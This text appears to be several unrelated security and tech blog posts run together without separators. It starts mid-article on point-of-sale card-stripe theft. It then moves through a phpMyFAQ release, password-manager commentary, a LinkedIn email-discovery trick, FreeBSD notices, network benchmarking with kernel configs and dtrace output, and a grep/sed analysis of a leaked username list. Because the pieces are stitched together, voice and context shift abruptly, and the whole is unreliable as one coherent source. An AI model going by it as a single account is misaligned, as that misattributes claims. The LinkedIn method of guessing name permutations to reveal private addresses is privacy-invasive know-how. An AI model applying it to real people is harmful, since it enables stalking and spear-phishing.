Point-of-sale malware, like the malware that hit C&K as well as Target, Home Depot, Neiman Marcus and other retailers this past year, is designed to steal the data encoded onto the magnetic stripe on the backs of debit and credit cards. This data can be used to create counterfeit cards, which are then typically used to purchase physical goods at big-box retailers.

The magnetic stripe on a credit or debit card contains several areas, or “tracks,” where cardholder information is stored: “Track 1″ includes the cardholder’s name, account number and other data. “Track 2,” contains the cardholder’s account, encrypted PIN and other information, but it does not include the account holder’s name.

An example of Track 1 and Track 2 data, together. Source: Appsecconsulting.com
Most U.S. states have data breach laws requiring businesses that experience a breach involving the personal and financial information of their citizens to notify those individuals in a timely fashion. However, few of those notification requirements are triggered unless the data that is lost or stolen includes the consumer’s name (see my reporting on the 2012 breach at Global Payments, e.g.).

This is important because a great many of the underground stores that sell stolen credit and debit data only sell Track 2 data. Translation: If the thieves are only stealing Track 2 data, a breached business may not have an obligation under existing state data breach disclosure laws to notify consumers about a security incident that resulted in the theft of their card data.

ENCRYPTION, ENCRYPTION, ENCRYPTION

Breaches like the one at C&K Systems involving stolen mag stripe data will continue for several years to come, even beyond the much-ballyhooed October 2015 liability shift deadline from Visa and MasterCard.

Much of the retail community is working to meet an October 2015 deadline put in place by MasterCard and Visa to move to chip-and-PIN enabled card terminals at their checkout lanes (in most cases, however, this transition will involve the less-secure chip-and-signature approach). Somewhat embarrassingly, the United States is the last of the G20 nations to adopt this technology, which embeds a small computer chip in each card that makes it much more expensive and difficult (but not impossible) for fraudsters to clone stolen cards.

That October 2015 deadline comes with a shift in liability for merchants who haven’t yet adopted chip-and-PIN (i.e., those merchants not in compliance could find themselves responsible for all of the fraudulent charges on purchases involving chip-enabled cards that were instead merely swiped through a regular mag-stripe card reader at checkout time).

Business Week recently ran a story pointing out that Home Depot’s in-store payment system “wasn’t set up to encrypt customers’ credit- and debit-card data, a gap in its defenses that gave potential hackers a wider window to exploit.” The story observed that although Home Depot “this year purchased a tool that would encrypt customer-payment data at the cash register, two of the former managers say current Home Depot staffers have told them that the installation isn’t complete.”

The crazy aspect of all these breaches over the past year is that we’re only hearing about those intrusions that have been detected. In an era when third-party vendors such as C&K Systems can go 18 months without detecting a break-in, it’s reasonable to assume that the problem is much worse than it seems.

Avivah Litan, a fraud analyst with Gartner Inc., said that at least with stolen credit card data there are mechanisms for banks to report a suspected breached merchant to the card associations. At that point, Visa and MasterCard will aggregate the reports to the suspected breached merchant’s bank, and request that the bank demand that the merchant hire a security firm to investigate. But in the case of breaches involving more personal data — such as Social Security numbers and medical information — very often there are few such triggers, and little recourse for affected consumers.

“It’s usually only the credit and debit card stuff that gets exposed,” Litan said. “Nobody cares if the more sensitive personal data is stolen because nobody is damaged by that except you as the consumer, and anyway you probably won’t have any idea how that data was stolen in the first place.”

Maybe it’s best that most breaches go undisclosed: It’s not clear how much consumers could stand if they knew about them all. In an opinion piece published today, New York Times writer Joe Nocera observed that “seven years have passed between the huge T.J. Maxx breach and the huge Home Depot breach — and nothing has changed.” Nocera asks: “Have we become resigned to the idea that, as a condition of modern life, our personal financial data will be hacked on a regular basis? It is sure starting to seem that way.” Breach fatigue, indeed.

The other observation I’d make about these card breaches is that the entire credit card system in the United States seems currently set up so that one party to a transaction can reliably transfer the blame for an incident to another. The main reason the United States has not yet moved to a more secure standard for handling cards, for example, has a lot to do with the finger pointing and blame game that’s been going on for years between the banks and the retail industry. The banks have said, “If the retailers only started installing chip-and-PIN card readers, we’d start issuing those types of cards.” The retailers respond: “Why should we spend the money upgrading all our payment terminals to handle chip-and-PIN when hardly any banks are issuing those types of cards?” And so it has gone for years.

For its part, C&K systems says it was relying on hardware and software that met current security industry standards but that was nevertheless deficient. Happily, the company reports that it is in the process of implementing point-to-point encryption to block any future attacks on its payment infrastructure.

“What we have learned during this process is that we rely and put our trust in many systems and individuals to help prevent these kinds of things from happening. However, there is no 100% failsafe security solution for hosting Point of Sale environments,” C&K Systems said. Their statement continues:

“The software we host for our customers is from a leading POS company and meets current PCI-DSS requirements of encrypted data in transit and data at rest. Point of sale terminals are vulnerable to memory scraping malware, which catches cards in memory before encryption can occur. Our software vendor is in the process of rolling out a full P2PE solution with tokenization that we anticipate receiving in October 2014. Our experience with the state of today’s threats will help all current and future customers develop tighter security measures to help reduce threat exposure and to make them more cognizant of the APTs that exist today and the impact of the potential threat to their businesses.”

Too many organizations only get religion about security after they’ve had a serious security breach, and unfortunately that inaction usually ends up costing the consumer more in the long run. But that doesn’t mean you have to be further victimized in the process: Be smart about your financial habits.

Using a credit card over a debit card, for example, involves fewer hassles and risks when your card information inevitably gets breached by some merchant. Pay close attention to your monthly statements and report any unauthorized charges immediately. And spend more time and energy protecting yourself from identity theft. Finally, take proactive steps to keep your inbox and your computer from being ravaged by cybercrooks.


The phpMyFAQ Team would like to announce the availability of phpMyFAQ 2.8.13, the “Joachim Fuchsberger” release. This release fixes multiple security vulnerabilities, all users of affected phpMyFAQ versions are encouraged to upgrade as soon as possible to this latest versions! A detailed security advisory is available. We also added SQLite3 support, backported from phpMyFAQ 2.9. […]


You probably noticed that in the (frequent) posts talking about security and passwords lately, I keep suggesting LastPass as a password manager. This is the manager that I use myself, and the reason why I came to this one is multi-faceted, but essentially I'm suggesting you use a tool that does not make it more inconvenient to maintain proper password hygiene. Because yes, you should be using different passwords, with a combination of letters, numbers and symbols, but if you have to come up with a new one every time, then things are going to be difficult and you'll just decide to use the same password over and over.

Or you'll use a method for having "unique" passwords that are actually comprised of a fixed part and a mobile one (which is what I used for the longest time). And let's be clear, using the same base password suffixed with the name of the site you're signing up for is not a protection at all, the moment more than one of your passwords is discovered.

So convenience being important, because inconvenience just leads to bad security hygiene, LastPass delivers on what I need: it has autofill, so I don't have to open a terminal and run sgeps (like I used to be) to get the password out of the store, it generates the password in the browser, so I don't have to open a terminal and run pwgen, it runs on my cellphone, so I can use it to fetch the password to type somewhere else, and it even auto-fills my passwords in the Android apps, so I don't have to use a simple password when dealing with some random website that then patches to an app on my phone. But it also has a few good "security conveniences": you can re-encode your Vault on a new master password, you can use a proper OTP pad or a 2FA device to protect it further, and they have some extras such as letting you know if the email you use across services are involved in an account breach.

This does not mean there are no other good password management tools, I know the name of plenty, but I just looked for one that had the features I cared about, and I went with it. I'm happy with LastPass right now. Yes, I need to trust the company and their code a fair bit, but I don't think that just being open source would gain me more trust. Being open source and audited for a long time, sure, but I don't think either way it's a dealbreaker for me. I mean Chrome itself has a password manager, it just feels not suitable for me (no generation, no obvious way to inspect the data from mobile, sometimes bad collation of URLs, and as far as I know no way to change the sync encryption password). It also requires me to have access to my Google account to get that data.

But the interesting part is how geeks will quickly suggest to just roll your own, be it using some open-source password manager, requiring an external sync system (I did that for sgeps, but it's tied to a single GPG key, so it's not easy for me having two different hardware smartcards), or even your own sync infrastructure. And this is what I really can't stand as an answer, because it solves absolutely nothing. Jürgen called it cynical last year, but I think it's even worse than that, it's hypocritical.

Roll-your-own or host-your-own are, first of all, not going to be options for the people who have no intention to learn how computer systems work — and I can't blame them, I don't want to know how my fridge or dishwasher work, I just want them working. People don't care to learn that you can get file A on computer B, but then if you change it on both while offline you'll have collisions, so now you lost one of the two changes. They either have no time, or just no interest or (but I don't think that happens often) no skill to understand that. And it's not just the random young adult that ends up registering on xtube because they have no idea what it means. Jeremy Clarkson had to learn the hard way what it means to publish your bank details to the world.

But I think it's more important to think of the amount of people who think that they have the skills and the time, and then are found lacking one or both of them. Who do you think can protect your content (and passwords) better? A big company with entire teams dedicated to security, or an average 16 years old guy who think he can run the website's forum? — The reference here is to myself: back in 2000/2001 I used to be the forum admin for an Italian gaming community. We got hacked, multiple times, and every time it was for me a new discovery of what security is. At the time third-party forum hosting was reserved to paying customers, and the results have probably been terrible. My personal admin password matched one of my email addresses up until last week and I know for a fact that at least one group of people got access to the password database, where they were stored in plain text.

Yes it is true, targets such as Adobe will lead to many more valid email addresses and password hashes than your average forum, but as the "fake" 5M accounts should have shown you, targeting enough small fishes can lead to just about the same results, if not even better, as you may be lucky and stumble across two passwords for the same account, which allows you to overcome the above-mentioned similar-but-different passwords strategy. Indeed, as I noted in my previous post, Comic Book Database admitted to be the source of part of that dump, and it lists at least four thousand public users (contributors). Other sites such as MythTV Talk or PoliceAuctions.com, both also involved, have no such statement ether.

This is not just a matter of the security of the code itself, so the "many eyes" answer does not apply. It is very well possible to have a screw up with an open source program as well, if it's misconfigured, or if a vulnerable version don't get updated in time because the admin just has no time. You see that all the time with WordPress and its security issues. Indeed, the reason why I don't migrate my blog to WordPress is that I won't ever have enough time for it.

I have seen people, geeks and non-geeks both, taking the easy way out too many times, blaming Apple for the nude celebrity pictures or Google for the five million accounts. It's a safe story: "the big guys don't know better", "you just should keep it off the Internet", "you should run your own!" At the end of the day, both turned out to be collections, assembled from many small cuts, either targeted or not, in part due to people's bad password hygiene (or operational security if you prefer a more geek term), and in part due to the fact that nothing is perfect.


One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing.

LinkedIn has built much of its considerable worth on the age-old maxim that “it’s all about who you know.” As a LinkedIn user, you can directly connect with those you attest to knowing professionally or personally, but also you can ask to be introduced to someone you’d like to meet by sending a request through someone who bridges your separate social networks. Celebrities, executives or any other LinkedIn users who wish to avoid unsolicited contact requests may do so by selecting an option that forces the requesting party to supply the personal email address of the intended recipient.

LinkedIn’s entire social fabric begins to unravel if any user can directly connect to any other user, regardless of whether or how their social or professional circles overlap. Unfortunately for LinkedIn (and its users who wish to have their email addresses kept private), this is the exact risk introduced by the company’s built-in efforts to expand the social network’s user base.

According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users.

LinkedIn assumes that if an email address is in your contacts list, that you must already know this person. But what if your entire reason for signing up with LinkedIn is to discover the private email addresses of famous people? All you’d need to do is populate your email account’s contacts list with hundreds of permutations of famous peoples’ names — including combinations of last names, first names and initials — in front of @gmail.com, @yahoo.com, @hotmail.com, etc. With any luck and some imagination, you may well be on your way to an A-list LinkedIn friends list (or a fantastic set of addresses for spear-phishing, stalking, etc.).

LinkedIn lets you know which of your contacts aren’t members.
When you import your list of contacts from a third-party service or from a stand-alone file, LinkedIn will show you any profiles that match addresses in your contacts list. More significantly, LinkedIn helpfully tells you which email addresses in your contacts lists are not LinkedIn users.

It’s that last step that’s key to finding the email address of the targeted user to whom LinkedIn has just sent a connection request on your behalf. The service doesn’t explicitly tell you that person’s email address, but by comparing your email account’s contact list to the list of addresses that LinkedIn says don’t belong to any users, you can quickly figure out which address(es) on the contacts list correspond to the user(s) you’re trying to find.

Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information. Last month, the two researchers detailed how they were able to de-anonymize posts to Secret, an app-driven online service that allows people to share messages anonymously within their circle of friends, friends of friends, and publicly. In February, Seely more famously demonstrated how to use Google Maps to intercept FBI and Secret Service phone calls.

This time around, the researchers picked on Dallas Mavericks owner Mark Cuban to prove their point with LinkedIn. Using their low-tech hack, the duo was able to locate the Webmail address Cuban had used to sign up for LinkedIn. Seely said they found success in locating the email addresses of other celebrities using the same method about nine times out ten.

“We created several hundred possible addresses for Cuban in a few seconds, using a Microsoft Excel macro,” Seely said. “It’s just a brute-force guessing game, but 90 percent of people are going to use an email address that includes components of their real name.”

The Rhino guys really wanted Cuban’s help in spreading the word about what they’d found, but instead of messaging Cuban directly, Seely pursued a more subtle approach: He knew Cuban’s latest start-up was Cyber Dust, a chat messenger app designed to keep your messages private. So, Seely fired off a tweet complaining that “Facebook Messenger crosses all privacy lines,” and that as  result he was switching to Cyber Dust.

When Mark Cuban retweeted Seely’s endorsement of Cyber Dust, Seely reached out to Cyberdust CEO Ryan Ozonian, letting him know that he’d discovered Cuban’s email address on LinkedIn. In short order, Cuban was asking Rhino to test the security of Cyber Dust.

“Fortunately no major faults were found and those he found are already fixed in the coming update,” Cuban said in an email exchange with KrebsOnSecurity. “I like working with them. They look to help rather than exploit.. We have learned from them and I think their experience will be valuable to other app publishers and networks as well.”

Cory Scott, director of information security at LinkedIn, said very few of the company’s members opt-in to the requirement that all new potential contacts supply the invitee’s email address before sending an invitation to connect. He added that email address-to-user mapping is a fairly common design pattern, and that is is not particularly unique to LinkedIn, and that nothing the company does will prevent people from blasting emails to lists of addresses that might belong to a targeted user, hoping that one of them will hit home.

“Email address permutators, of which there are many of them on the ‘Net, have existed much longer than LinkedIn, and you can blast an email to all of them, knowing that most likely one of those will hit your target,” Scott said. “This is kind of one of those challenges that all social media companies face in trying to prevent the abuse of [site] functionality. We have rate limiting, scoring and abuse detection mechanisms to prevent frequent abusers of this service, and to make sure that people can’t validate spam lists.”

In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses.

“We are in the process of implementing two short-term changes and one longer term change to give our members more control over this feature,” Linkedin spokeswoman Nicole Leverich wrote in an emailed statement. “In the next few weeks, we are introducing new logic models designed to prevent hackers from abusing this feature. In addition, we are making it possible for members to ask us to opt out of being discoverable through this feature. In the longer term, we are looking into creating an opt-out box that members can choose to select to not be discoverable using this feature.”


The first BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.


When I posted my previous post on accounts on Google+ I received a very interesting suggestions that I would like to bring to the attention of more people. Andrew Cooks pointed out that what LastPass (and other password managers) really need, is a way to specify the password policy programmatically, rather than crowdsourcing this data as LastPass is doing right now.

There are already a number of cross-product specifications of fixed-path files used to describe parameters such as robots.txt or sitemap.xml. While cleaning up my blog's image serving I also found that there is a rules.abe file used by the NoScript extension for Firefox. In this optic, adding a new password-policy.txt file to define some parameters for the password policy of the website.

Things like the minimum and maximum length of the password, which characters are allowed, whether it is case sensitive or not. These are important information that all the password managers need to know, and as I said not all websites make it clear to the user either. I'll recount two different horror stories, one in the past and one more recent, that show how that is important.

The first story is from probably almost ten years ago or so. I registered with the Italian postal service. I selected a "strong" (not really) password, 11 characters long. It was not really dictionary-based, but it was close enough if you knew my passwords' pattern. Anyway, I liked the idea of having the long password. I signed up for it, I logged back in, everything worked. Until a few months later, when I decided I wanted to fetch that particular mailbox from GMail — yes, the Italian postal service gives you an email box, no I don't want to comment further on that.

What happens is that the moment I tried to set up the mail fetching on GMail, it kept failing authentication. And I'm sure I used the right password that I've insisted using up to that point! I log in on the website just fine with it, so what gives? A quick check at the password that my browser (I think Firefox at the time) think is the password of that website shows me the truth: the password I've been using to log in does not match the one I tried to use from GMail: the last character is not there. Some further inspection of the postal service website shows that the password fields, both in the password change and login (and I assumed at the time the registration page for obvious reasons), set a maxlength value to 10. So of course, as long as I typed or pasted the password in the field, the way I typed it when I registered, it worked perfectly fine, but when I tried to login out of band (through POP3) it used the password as I intended, and failed.

A similar, more recent story happened with LastMinute. I went to change my password, in my recent spree of updating all my passwords, even for accounts not in use (mostly to make sure that they don't get leaked and allow people to do crazy stuff to me). My default password generator on LastPass is set to generate 32-characters passwords. But that did not work for LastMinute, or rather, it appeared to. It let me change my password just fine, but when I tried logging back in, well, it did not work. Yes, this is the reason that I try to log back in after generating the password, I've seen that happening before. In this case, the problem was to be found in the length of the password.

But just having a proper range for the password length wouldn't be enough. Other details that would be useful are for instance the allowed symbols; I have found that sometimes I need to either generate a number of passwords to find one that does not have one of the disallowed symbols but still has some, or give up on the symbols altogether and ask LastPass to generate only letters and numbers. Or having a way to tell that the password is case sensitive or not — because if it is not, what I do is disable the generation of one set of letters, so that it randomises them better.

But there is more metadata that could be of use there — things like which domains should the password be used with, for instance. Right now LastPass has a (limited) predefined list of equivalent domains, and hostnames that need to match exactly (so that bugs.gentoo.org and forums.gentoo.org are given different passwords), while it's up to you to build the rest of the database. Even for the Amazon domains, the list is not comprehensive and I had to add quite a few when logging in the Italian and UK stores.

Of course if you were just to tell that your website uses the same password as, say, google.com, you're going to have a problem. What you need is a reciprocal indication that both sites think the other is equivalent, basically serving the same identical file. This makes the implementation a bit more complex but it should not be too difficult as those kind of sites tend to at least share robots.txt (okay, not in the case of Amazon), so distributing one more file should not be that difficult.

I'm not sure if anybody is going to work on implementing this, or writing a proper specification for it, rather than a vague rant on a blog, but hope can't die, right?


I think it's about time I shared some more details about the RSS stuff going into FreeBSD and how I'm testing it.

For now I'm focusing on IPv4 + UDP on the Intel 10GE NICs. The TCP side of things is done (and the IPv6 side of things works too!) but enough of the performance walls show up in the IPv4 UDP case that it's worth sticking to it for now.

I'm testing on a pair of 4-core boxes at home. They're not special - and they're very specifically not trying to be server-class hardware. I'd like to see where these bottlenecks are even at low core count.

The test setup in question:

Testing software:

  • http://github.com/erikarn/freebsd-rss
  • It requires libevent2 - an updated copy; previous versions of libevent2 didn't handle FreeBSD specific errors gracefully and would early error out of the IO loop.

Server:

  • CPU: Intel(R) Core(TM) i5-3550 CPU @ 3.30GHz (3292.59-MHz K8-class CPU)
  • There's no SMT/HTT, but I've disabled it in the BIOS just to be sure
  • 4GB RAM
  • FreeBSD-HEAD, amd64
  • NIC:  '82599EB 10-Gigabit SFI/SFP+ Network Connection
  • ix0: 10.11.2.1/24
/etc/sysctl.conf:

# for now redirect processing just makes the lock overhead suck even more.
# disable it.
net.inet.ip.redirect=0
net.inet.icmp.drop_redirect=1
/boot/loader.conf:

hw.ix.num_queues=8

# experiment with deferred dispatch for RSS
net.isr.numthreads=4
net.isr.maxthreads=4
net.isr.bindthreads=1
 
kernel config:

include GENERIC
ident HACKBOX

device netmap
options RSS
options PCBGROUP

# in-system lock profiling
options LOCK_PROFILING

# Flowtable - the rtentry locking is a bit .. slow.
options   FLOWTABLE

# This debugging code has too much overhead to do accurate
# testing with.
nooptions         INVARIANTS
nooptions         INVARIANT_SUPPORT
nooptions         WITNESS
nooptions         WITNESS_SKIPSPIN

The server runs the "rss-udp-srv" process, which behaves like a multi-threaded UDP echo server on port 8080.

Client

The client box is slightly more powerful to compensate for (currently) not using completely affinity-aware RSS UDP transmit code.

  • CPU: Intel(R) Core(TM) i5-4460  CPU @ 3.20GHz (3192.68-MHz K8-class CPU)
  • SMT/HTT: Disabled in BIOS
  • 8GB RAM
  • FreeBSD-HEAD amd64
  • Same kernel config, loader and sysctl config as the server
  • ix0: configured as 10.11.2.2/24, 10.11.2.3/32, 10.11.2.4/32, 10.11.2.32/32, 10.11.2.33/32
The client runs 'udp-clt' programs to source and sink traffic to the server.

Running things

The server-side simply runs the listen server, configured to respond to each frame:

$ rss-udp-srv 1 10.11.2.1

The client-side runs four couples of udp-clt, each from different IP addresses. These are run in parallel (i do it in different screens, so I can quickly see what's going on):

$ ./udp-clt -l 10.11.2.3 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.4 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.32 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l 10.11.2.33 -r 10.11.2.1 -p 8080 -n 10000000000 -s 510

The IP addresses are chosen so that the 2-tuple topelitz hash using the default Microsoft key hash to different RSS buckets that live on individual CPUs.

Results: Round one

When the server is responding to each frame, the following occurs. The numbers are "number of frames generated by the client (netstat)", "number of frames received by the server (netstat)", "number of frames seen by udp-rss-srv", "number of responses transmitted from udp-rss-srv", "number of frames seen by the server (netstat)"
  • 1 udp-clt process: 710,000; 710,000; 296,000; 283,000; 281,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 592,000; 592,000; 575,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 636,000; 636,000; 600,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 255,000; 255,000; 255,000
So, it's not actually linear past two cores. The question here is: why?

There are a couple of parts to this.

Firstly - I had left turbo boost on. What this translated to:

  • One core active: ~ 30% increase in clock speed
  • Two cores active: ~ 30% increase in clock speed
  • Three cores active: ~ 25% increase in clock speed
  • Four cores active: ~ 15% increase in clock speed.
Secondly and more importantly - I had left flow control enabled. This made a world of difference.

The revised results are mostly linear - with more active RSS buckets (and thus CPUs) things seem to get slightly more efficient:
  • 1 udp-clt process: 710,000; 710,000; 266,000; 266,000; 266,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 512,000; 512,000; 512,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 810,000; 810,000; 810,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 1,120,000; 1,120,000; 1,120,000

Finally, let's repeat the process but only receiving instead also echoing back the packet to the client:

$ rss-udp-srv 0 10.11.2.1
  • 1 udp-clt process: 710,000; 710,000; 204,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 378,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 645,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 900,000
The receive-only workload is actually worse off versus the transmit + receive workload!

What's going on here?

Well, a little digging shows that in both instances - even with a single udp-clt thread running which means only one CPU on the server side is actually active! - there's active lock contention.

Here's an example dtrace output for measuring lock contention with only one active process, where one CPU is involved (and the other three are idle):

Receive only, 5 seconds:

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # dtrace -n 'lockstat:::adaptive-block { @[stack()] = sum(arg1); }'
dtrace: description 'lockstat:::adaptive-block ' matched 1 probe
^C

              kernel`udp_append+0x11c
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
         46729281


Transmit + receive, 5 seconds:

dtrace: description 'lockstat:::adaptive-block ' matched 1 probe
^C

              kernel`knote+0x7e
              kernel`sowakeup+0x65
              kernel`udp_append+0x14a
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
             3793

              kernel`udp_append+0x11c
              kernel`udp_input+0x8cc
              kernel`ip_input+0x116
              kernel`netisr_dispatch_src+0x1cb
              kernel`ether_demux+0x123
              kernel`ether_nh_input+0x34d
              kernel`netisr_dispatch_src+0x61
              kernel`ether_input+0x26
              kernel`ixgbe_rxeof+0x2f7
              kernel`ixgbe_msix_que+0xb6
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
          3823793

              kernel`ixgbe_msix_que+0xd3
              kernel`intr_event_execute_handlers+0x83
              kernel`ithread_loop+0x96
              kernel`fork_exit+0x71
              kernel`0xffffffff80cd19de
          9918140

Somehow it seems there's less lock contention / blocking going on when both transmit and receive is running!

So then I dug into it using the lock profiling suite. This is for 5 seconds with receive-only traffic on a single RSS bucket / CPU (all other CPUs are idle):

# sysctl debug.lock.prof.enable = 1; sleep 5 ; sysctl debug.lock.prof.enable=0

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl debug.lock.prof.enable=1 ; sleep 5 ; sysctl debug.lock.prof.enable=0
debug.lock.prof.enable: 1 -> 1

debug.lock.prof.enable: 1 -> 0

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl debug.lock.prof.stats | head -2 ; sysctl debug.lock.prof.stats | sort -nk4 | tail -10
debug.lock.prof.stats: 
     max  wait_max       total  wait_total       count    avg wait_avg cnt_hold cnt_lock name
    1496         0       10900           0          28    389      0  0      0 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2755 (sx:USB config SX lock)
debug.lock.prof.stats: 
       0         0          31           1          67      0      0  0      4 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:888 (spin mutex:sched lock 2)
       0         0        2715           1       49740      0      0  0      7 /usr/home/adrian/work/freebsd/head/src/sys/dev/random/random_harvestq.c:294 (spin mutex:entropy harvest mutex)
       1         0          51           1         131      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:1179 (spin mutex:sched lock 1)
       0         0          69           2         170      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:886 (spin mutex:sched lock 2)
       0         0       40389           2      287649      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/kern_intr.c:1359 (spin mutex:sched lock 2)
       0         2           2           4          12      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2762 (sleep mutex:Giant)
      15        20        6556         520        2254      2      0  0    105 /usr/home/adrian/work/freebsd/head/src/sys/dev/acpica/Osd/OsdSynch.c:535 (spin mutex:ACPI lock (0xfffff80002b10f00))

       4         5      195967       65888     3445501      0      0  0  28975 /usr/home/adrian/work/freebsd/head/src/sys/netinet/udp_usrreq.c:369 (sleep mutex:so_rcv)

Notice the lock contention for the so_rcv (socket receive buffer) handling? What's going on here is pretty amusing - it turns out that because there's so much receive traffic going on, the userland process receiving the data is being preempted by the NIC receive thread very often - and when this happens, there's a good chance it's going to be within the small window that the receive socket buffer lock is held. Once this happens, the NIC receive thread processes frames until it gets to one that requires it to grab the same sock buffer lock that is already held by userland - and it fails - so the NIC thread sleeps until the userland thread finishes consuming a packet. Then the CPU flips back to the NIC thread and continues processing a packet.

When the userland code is also transmitting frames it's increasing the amount of time in between socket receives and decreasing the probability of hitting the lock contention condition above.

Note there's no contention between CPUs here - this is entirely contention within a single CPU.

So for now I'm happy that the UDP IPv4 path is scaling well enough with RSS on a single core. The main performance problem here is the socket receive buffer locking (and, yes, copyin() / copyout().)

Next!


There has been some noise around a leak of users/passwords pairs which somehow panicked people into thinking it was coming from a particular provider. Since it seems most people have not even tried looking at the account information available, I'd like to point out some ways that could have helped avoiding the panic, if only the reporters cared. It also fits nicely into my previous notes on accounts' churn.

But before proceeding let me make one thing straight: this post contains no information that is not available to the public and bears no relation to my daily work for my employer. Just wanted to make that clear. Edit: for the official response, please see this blog post of Google's Security blog.

To begin the analysis you need a copy of the list of usernames; Italian blogger Paolo Attivissimo linked to it in his post but I'm not going to do so. Especially since it's likely to become obsolete soon, and might not be liked by many. The archive is a compressed list of usernames without passwords or password hashes. At first, it seems to contain almost exclusively gmail.com addresses — in truth there are more addresses but it probably does not hit the news as much to say that there are some 5 million addresses from some thousand domains.

Let's first try to extract real email addresses from the file, which I'll call rawsource.txt — yes it does not match the name of the actual source file out there but I would rather avoid the search requests finding this post from the filename.

$ fgrep @ rawsource.txt > source-addresses.txt
This removes some two thousands lines that were not valid addresses — turns out that the file actually contains some passwords, so let's process it a little more to get a bigger sample of valid addresses:

$ sed -i -e 's:|.*::' source-addresses.txt
This should make the next command give us a better estimate of the content:

$ sed -n -e 's:.*@::p' source-addresses.txt | sort | uniq -c | sort -n
[snip]
  238 gmail.com.au
256 gmail.com.br
338 gmail.com.vn
608 gmail.com777
123215 yandex.ru
4800129 gmail.com
So as we were saying earlier there are more than just Google accounts in this. A good chunk of them are on Yandex, but if you look at the outlier in the list there are plenty of other domains including Yahoo. Let's just filter away the four thousands addresses using either broken domains or outlier domains and instead focus on these three providers:

$ egrep '@(gmail.com|yahoo.com|yandex.ru)$' source-addresses.txt > good-addresses.txt
Now things get more interesting, because to proceed to the next step you have to know how email servers and services work. For these three providers, and many default setups for postfix and similar, the local part of the address (everything before the @ sign) can contain a + sign, when that is found, the local part is split into user and extension, so that mail to nospam+noreally would be sent to the user nospam. Servers generally ignore the extension altogether, but you can use it to either register multiple accounts on the same mailbox (like I do for PayPal, IKEA, Sony, …) or to filter the received mail on different folders. I know some people who think they can absolutely identify the source of spam this way — I'm a bit more skeptical, if I was a spammer I would be dropping the extension altogether. Only some very die-hard Unix fans would not allow inbound email without an extension. Especially since I know plenty of services that don't accept email addresses with + in them.

Since this is not very well known, there are going to be very few email addresses using this feature, but that's still good because it limits the amount of data to crawl through. Finding a pattern within 5M addresses is going to take a while, finding one in 4k is much easier:

$ egrep '.*\+.*@.*' good-addresses.txt | sed -e '/.*@.*@.*/d' > experts-addresses.txt
The second command filters out some false positives due to two addresses being on the same line; the results from the source file I started with is 3964 addresses. Now we're talking. Let's extract the extensions from those good addresses:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort > extensions.txt
The first obvious thing you can do is figure out if there are duplicates. While the single extensions are probably interesting too, finding a pattern is easier if you have people using the same extension, especially since there aren't that many. So let's see which extensions are common:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort | uniq -c -d | sort -n > common-extensions.txt
An obvious quick look look of that shows that a good chunk of the extensions (the last line in the generated file) used were referencing xtube – which you may or may not know as a porn website – reminding me of the YouPorn-related leak two and a half years ago. Scouring through the list of extensions, it's also easy to spot the words "porn" and "porno", and even "nudeceleb" making the list probably quite up to date.

